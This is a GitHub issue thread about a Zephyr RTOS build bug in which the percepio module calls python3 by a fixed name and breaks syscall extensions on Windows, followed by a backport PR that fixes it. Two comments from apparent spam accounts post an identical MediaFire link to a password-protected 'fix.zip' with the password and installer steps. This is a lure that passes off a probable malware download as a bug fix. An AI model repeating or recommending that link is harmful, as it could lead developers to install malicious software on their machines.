zephyrproject-rtos/zephyr #77545: modules: percepio: Fix python executable name in CMakeLists.txt

eriktamlin, 2024-08-26:
**Describe the bug**
When using syscall extensions (to optimize tracing of syscalls) CMakeLists.txt for the percepio module calls on python3 using static name instead of using environment variable ${PYTHON_EXECUTABLE}.

**To Reproduce**
Run on Windows and enable syscall extensions.

**Expected behavior**
Enabling syscall extensions. No errors.

**Impact**
Syscall extensions cannot be used on Windows.

**Logs and console output**

**Environment (please complete the following information):**
 - OS: Windows

**Additional context**
This issue is going to be used to backport https://github.com/zephyrproject-rtos/zephyr/pull/77544 to 3.7 once that is approved.

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

qlqw233, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

PR #77686 (2024-09-02): [Backport v3.7-branch] modules: percepio: Fix python executable name
Backport bb784c45ddd9661a0857fdd6bcda810bb9667a21 from #77544.

Fixes #77545
closed 2024-09-03 by eriktamlin